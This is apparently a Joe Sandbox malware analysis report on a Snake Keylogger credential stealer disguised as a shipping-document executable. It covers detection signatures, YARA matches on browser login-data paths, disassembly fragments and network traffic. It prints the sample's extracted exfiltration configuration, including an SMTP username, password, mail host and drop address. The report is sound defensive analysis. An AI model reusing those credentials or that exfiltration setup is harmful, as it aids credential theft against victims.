Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report GU#U00cdA DE CARGA...exe

Overview

General Information

Sample Name:GU#U00cdA DE CARGA...exe
Analysis ID:491666
MD5:fcce8f5a7e5fcdf78c02d6543c1af2bd
SHA1:b2ea7197933811fc65425d46324af8ee231117f3
SHA256:9ff6781bac4d77465a973def710d9619cfa7fc6fe16a78225b7e22d3a89d0be0
Tags:ESPexegeoSnakeKeylogger
Infos:

Most interesting Screenshot:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Telegram RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • GU#U00cdA DE CARGA...exe (PID: 2848 cmdline: 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe' MD5: FCCE8F5A7E5FCDF78C02D6543C1AF2BD)
    • GU#U00cdA DE CARGA...exe (PID: 400 cmdline: 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe' MD5: FCCE8F5A7E5FCDF78C02D6543C1AF2BD)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "24310@24310.gr", "Password": "?_bEpvL{rN$%", "Host": "mail.24310.gr", "Port": "themainlogs@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x2bb78:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x2ad61:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x2b1a8:$a4: \Orbitum\User Data\Default\Login Data
  • 0x2c329:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x1a720:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x19909:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x19d50:$a4: \Orbitum\User Data\Default\Login Data
        • 0x1aed1:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 22 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.1.GU#U00cdA DE CARGA...exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x2bb78:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x2ad61:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x2b1a8:$a4: \Orbitum\User Data\Default\Login Data
        • 0x2c329:$a5: \Kometa\User Data\Default\Login Data
        2.1.GU#U00cdA DE CARGA...exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          2.1.GU#U00cdA DE CARGA...exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            2.1.GU#U00cdA DE CARGA...exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x2bb78:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x2ad61:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x2b1a8:$a4: \Orbitum\User Data\Default\Login Data
              • 0x2c329:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 67 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "24310@24310.gr", "Password": "?_bEpvL{rN$%", "Host": "mail.24310.gr", "Port": "themainlogs@gmail.com"}
              Machine Learning detection for sampleShow sources
              Source: GU#U00cdA DE CARGA...exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dllJoe Sandbox ML: detected
              Source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpackAvira: Label: TR/Spy.Gen
              Source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpackAvira: Label: TR/Dropper.Gen

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeUnpacked PE file: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack
              Detected unpacking (creates a PE file in dynamic memory)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeUnpacked PE file: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack
              Source: GU#U00cdA DE CARGA...exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.5:49741 version: TLS 1.0
              Source: Binary string: wntdll.pdbUGP source: GU#U00cdA DE CARGA...exe, 00000001.00000003.265170689.000000000E9E0000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: GU#U00cdA DE CARGA...exe, 00000001.00000003.265170689.000000000E9E0000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00405EC2 FindFirstFileA,FindClose,1_2_00405EC2
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004054EC
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00402671 FindFirstFileA,1_2_00402671
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FE9A7h2_2_047FE6E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FE547h2_2_047FE28B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FC868h2_2_047FBE7F
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FD290h2_2_047FCE78
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FE0E7h2_2_047FDE29
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FDC87h2_2_047FD9C8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FCCC9h2_2_047FCA0E
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FEE07h2_2_047FEB4B
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FD290h2_2_047FD1BE
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_047FB3A0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 047FD290h2_2_047FCE68
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_047FB9D3
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_047FBBB4
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580A049h2_2_05809DA0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580D469h2_2_0580D1C0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580A4A1h2_2_0580A1F8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580CBB9h2_2_0580C910
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05809BF1h2_2_05809948
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580D011h2_2_0580CD68
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05809341h2_2_05809098
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580C761h2_2_0580C4B8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05809799h2_2_058094F0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580BEB1h2_2_0580BC08
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05808EE9h2_2_05808C40
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580C309h2_2_0580C060
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05808639h2_2_05808390
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580BA59h2_2_0580B7B0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05808A91h2_2_058087E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580B1A9h2_2_0580AF00
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580B601h2_2_0580B358
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580AD51h2_2_0580AAA8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580D8C1h2_2_0580D618
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580A8F9h2_2_0580A650
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 0580DD19h2_2_0580DA70
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05824831h2_2_05824588
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 058236A9h2_2_05823400
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05825991h2_2_058256E8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 058229A1h2_2_058226F8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 058243D9h2_2_05824130
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05825539h2_2_05825290
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05822549h2_2_058222A0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05823F82h2_2_05823CD8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05823251h2_2_05822FA8
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 058220C9h2_2_05821E20
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 058250E1h2_2_05824E38
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05824C89h2_2_058249E0
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05823B01h2_2_05823858
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05825DE9h2_2_05825B40
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 4x nop then jmp 05822DF9h2_2_05822B50

              Networking:

              barindex
              May check the online IP address of the machineShow sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeDNS query: name: checkip.dyndns.org
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeDNS query: name: checkip.dyndns.org
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeDNS query: name: checkip.dyndns.org
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeDNS query: name: checkip.dyndns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: global trafficHTTP traffic detected: GET /xml/185.189.150.72 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 216.146.43.70 216.146.43.70
              Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.5:49741 version: TLS 1.0
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: GU#U00cdA DE CARGA...exeString found in binary or memory: http://checkip.dyndns.org/
              Source: GU#U00cdA DE CARGA...exe, 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org4
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.orgD8
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: http://freegeoip.app
              Source: GU#U00cdA DE CARGA...exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: GU#U00cdA DE CARGA...exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: GU#U00cdA DE CARGA...exe, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app
              Source: GU#U00cdA DE CARGA...exe, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpString found in binary or memory: https://freegeoip.app/xml/
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/185.189.150.72
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/185.189.150.72x
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app4
              Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET /xml/185.189.150.72 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404FF1

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: GU#U00cdA DE CARGA...exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
